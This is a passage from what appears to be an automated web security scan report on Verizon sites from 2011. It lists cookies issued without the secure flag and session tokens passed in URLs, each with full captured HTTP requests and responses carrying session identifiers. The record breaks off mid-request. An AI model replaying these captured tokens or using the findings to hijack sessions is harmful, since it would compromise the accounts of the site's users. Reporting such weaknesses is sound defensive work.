dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~

Response

HTTP/1.0 200 OK
Content-Length: 587
Content-Type: image/gif
Content-Location: http://www22.verizon.com/images/headerfooter/scbsmbhoriztile.gif
Last-Modified: Sun, 17 Jul 2011 02:18:40 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 22:22:05 GMT
Connection: keep-alive
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660;path=/;httponly

...[SNIP]...

6.53. https://www22.verizon.com/includes/cache/15/blank.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /includes/cache/15/blank.html

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /includes/cache/15/blank.html HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://smallbusiness.verizon.com/products/voice/plans.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~

Response

HTTP/1.0 200 OK
Content-Length: 0
Content-Type: text/html
Last-Modified: Fri, 07 May 2010 18:39:58 GMT
Accept-Ranges: bytes
ETag: "e8adcb114eeca1:111b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 22:22:04 GMT
Connection: keep-alive
Set-Cookie: ak-sf=false; expires=Mon, 05-Sep-2011 22:27:04 GMT; path=/includes/; domain=verizon.com


6.54. https://www22.verizon.com/includes/cache/getwb31.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /includes/cache/getwb31.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /includes/cache/getwb31.asp?zip=10011 HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: https://signin.verizon.com/sso/ForgotUserIDPassword
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 683
Content-Type: text/javascript
Expires: Mon, 05 Sep 2011 22:28:18 GMT
Cache-Control: Private
Date: Mon, 05 Sep 2011 22:23:18 GMT
Connection: keep-alive
Set-Cookie: ak-sf=false; expires=Mon, 05-Sep-2011 22:28:18 GMT; path=/includes/; domain=verizon.com


rewriteHTML('scbwbnotice','');
rewriteHTML('scbwblinktext','New York,&nbsp;NY&nbsp;10011');
rewriteHTML('scbwbicon','<a href=\'http://weather.weatherbug.com/NY/New York-weather.html?zcode=z6726&zi
...[SNIP]...

6.55. https://www22.verizon.com/includes/javascript/commonjs/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /includes/javascript/commonjs/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /includes/javascript/commonjs/ HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://surround.verizon.com/Shop/Utilities/verizonyourdomain.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
Content-Type: text/html
Date: Mon, 05 Sep 2011 22:21:41 GMT
Content-Length: 18981
Connection: keep-alive
Set-Cookie: ak-sf=false; expires=Mon, 05-Sep-2011 22:26:41 GMT; path=/includes/; domain=verizon.com


var arrHost=(window.location.hostname).split('.');
var scbCkDom='.'+arrHost[arrHost.length-2]+'.'+arrHost[arrHost.length-1];

/* detect.js */

var agt=navigator.userAgent.toLowerCase();
va
...[SNIP]...

6.56. https://www22.verizon.com/includes/javascript/hbx.js/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /includes/javascript/hbx.js/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /includes/javascript/hbx.js/ HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://surround.verizon.com/Shop/Utilities/verizonyourdomain.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
Date: Mon, 05 Sep 2011 22:21:42 GMT
Content-Length: 16426
Connection: keep-alive
Set-Cookie: ak-sf=false; expires=Mon, 05-Sep-2011 22:26:42 GMT; path=/includes/; domain=verizon.com


//hbx.js,HBX2.5,Copyright 1997 - 2008. Omniture, Inc. All Rights Reserved. Omniture is a registered trademark of Omniture, Inc. in the United States, Canada, Japan, and the European Community.
/*
...[SNIP]...

6.57. https://www22.verizon.com/includes/javascript/hbx_custom.js/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /includes/javascript/hbx_custom.js/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /includes/javascript/hbx_custom.js/ HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://surround.verizon.com/Shop/Utilities/verizonyourdomain.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
Date: Mon, 05 Sep 2011 22:21:41 GMT
Content-Length: 19482
Connection: keep-alive
Set-Cookie: ak-sf=false; expires=Mon, 05-Sep-2011 22:26:41 GMT; path=/includes/; domain=verizon.com


if(typeof(ghfT)=='undefined'){var ghfT='noscb';}

function fObj(n,d){
   var p,i,x;if(!d)d=document;if((p=n.indexOf('?'))>0&&parent.frames.length){
   d=parent.frames[n.substring(p+1)].document;n=n.
...[SNIP]...

6.58. https://www22.verizon.com/includes/javascript/sitewise.js/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /includes/javascript/sitewise.js/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /includes/javascript/sitewise.js/ HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://search.verizon.com/?market=94531+zz&q=oss+sq&rv=b&st=zz&tp=c&u1=q
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
Content-Length: 10531
Date: Mon, 05 Sep 2011 22:21:59 GMT
Connection: keep-alive
Set-Cookie: ak-sf=false; expires=Mon, 05-Sep-2011 22:26:59 GMT; path=/includes/; domain=verizon.com


// START OF SDC Advanced Tracking Code
// Copyright (c) 1996-2005 WebTrends Inc. All rights reserved.
// V8.0
// $DateTime: 2006/05/02 08:33:13 $

var gService = true;
var gTimeZone = -6;

...[SNIP]...

6.59. https://www22.verizon.com/vztracker/vzTracker.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /vztracker/vzTracker.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /vztracker/vzTracker.aspx?appName=ECSP_OLH&Type=2|A&requestUrl=javscrit%3AO_LC%28%29%3B&referrer=http%3A//www22.verizon.com/ResidentialHelp/Generic/Ask%2520Verizon/Getting%2520Started/124519.htm&Title=Feedbackfeedbacklink&id=2563991732895.3745 HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://www22.verizon.com/ResidentialHelp/Generic/Ask%20Verizon/Getting%20Started/124519.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; CMS_TimeZoneOffset=300; CP=null*; refURL=http://www22.verizon.com/ResidentialHelp/Generic/Ask%20Verizon/Getting%20Started/124519.htm; RecentlyVisited=Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; PDSS=PflowId=680d1ca400d842e69be1848a9f3d28c5; 
DSS=flowId=f9688e84baaa4126acd87151b526b588; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html
Expires: Mon, 05 Sep 2011 22:24:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:24:19 GMT
Content-Length: 909
Connection: keep-alive
Set-Cookie: ak-sf=false; expires=Mon, 05-Sep-2011 22:29:19 GMT; path=/vztracker/; domain=verizon.com


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>vzTracker</title>
       <meta content="Microsoft Visual Studio 7.0" name="GENERATOR">
       <meta content="C#" na
...[SNIP]...

7. Session token in URL
There are 6 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


7.1. https://collaborateext.verizon.com/aims/encore/VZEncoreJSJVLoop.serv

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://collaborateext.verizon.com
Path:   /aims/encore/VZEncoreJSJVLoop.serv

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

POST /aims/encore/VZEncoreJSJVLoop.serv?XMLHttpRequest=true&jsClientInclude=true&id=EncoreSESS-EXT-PRODUCTION87802&encAimsSessionID=GUmEyiQO9Y8UAztLasJjctrSjnS0g36%20tSa8hin5LSA=&clientLogStr=aimsSessionID=EncoreSESS-EXT-PRODUCTION87802 HTTP/1.1
Host: collaborateext.verizon.com
Connection: keep-alive
Referer: https://collaborateext.verizon.com/aims/encore/VzVAgent.jsp?userId=EncoreSESS-EXT-PRODUCTION87802&encUserId=GUmEyiQO9Y8UAztLasJjctrSjnS0g36+tSa8hin5LSA=
Content-Length: 162
Origin: https://collaborateext.verizon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; NSC_dpmmbcfyubjnt_mcw=ffffffff8f64125045525d5f4f58455e445a4a422971

xml=%3Cxml%3E%3CaimsSessionID%3EEncoreSESS-EXT-PRODUCTION87802%3C/aimsSessionID%3E%3CmessageCount%3E0%3C/messageCount%3E%3CloopCount%3E1%3C/loopCount%3E%3C/xml%3E

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Mon, 05 Sep 2011 22:23:58 GMT
Content-type: text/xml
Cache-Control: no-store
Pragma: no-cache
Expires: 0
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 1271

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<response>
<result>setChatID('09051125093');incrMessageCount();allowSending();incrMessageCount();setVisitorTextFromServer('You%20said','Forg
...[SNIP]...

7.2. https://collaborateext.verizon.com/aims/encore/VZEncorePostlet.serv

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://collaborateext.verizon.com
Path:   /aims/encore/VZEncorePostlet.serv

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

POST /aims/encore/VZEncorePostlet.serv?XMLHttpRequest=true&appId=141&encAimsSessionID=GUmEyiQO9Y8UAztLasJjctrSjnS0g36%20tSa8hin5LSA=&aimsSessionID=EncoreSESS-EXT-PRODUCTION87802&clientLogStr=aimsSessionID=EncoreSESS-EXT-PRODUCTION87802,%20chatId=09051125093&randomId=510145766 HTTP/1.1
Host: collaborateext.verizon.com
Connection: keep-alive
Referer: https://collaborateext.verizon.com/aims/encore/VzVAgent.jsp?userId=EncoreSESS-EXT-PRODUCTION87802&encUserId=GUmEyiQO9Y8UAztLasJjctrSjnS0g36+tSa8hin5LSA=
Content-Length: 147
Origin: https://collaborateext.verizon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
